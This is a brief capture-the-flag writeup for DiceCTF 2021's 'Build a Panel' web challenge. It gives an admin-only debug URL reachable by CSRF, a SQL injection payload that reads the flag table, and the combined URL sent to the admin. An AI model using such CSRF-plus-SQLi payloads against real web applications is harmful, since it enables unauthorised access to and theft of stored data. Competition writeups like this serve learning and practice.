CTFtime.org / DiceCTF 2021 / Build a Panel / Writeup

Tags: web

Rating: 1.0

CSRF URL: [https://build-a-panel.dicec.tf/admin/debug/add_widget](https://build-a-panel.dicec.tf/admin/debug/add_widget) (only Admin can access)

SQLi payload: `<Your panel ID>',(select flag from flag),'{"type":"a"}');#`

Final payload to send to Admin: `https://build-a-panel.dicec.tf/admin/debug/add_widget?panelid=<Your panel ID>',(select flag from flag),'{"type":"a"}');#`.

Original writeup (http://github.com/effectRenan/CTF).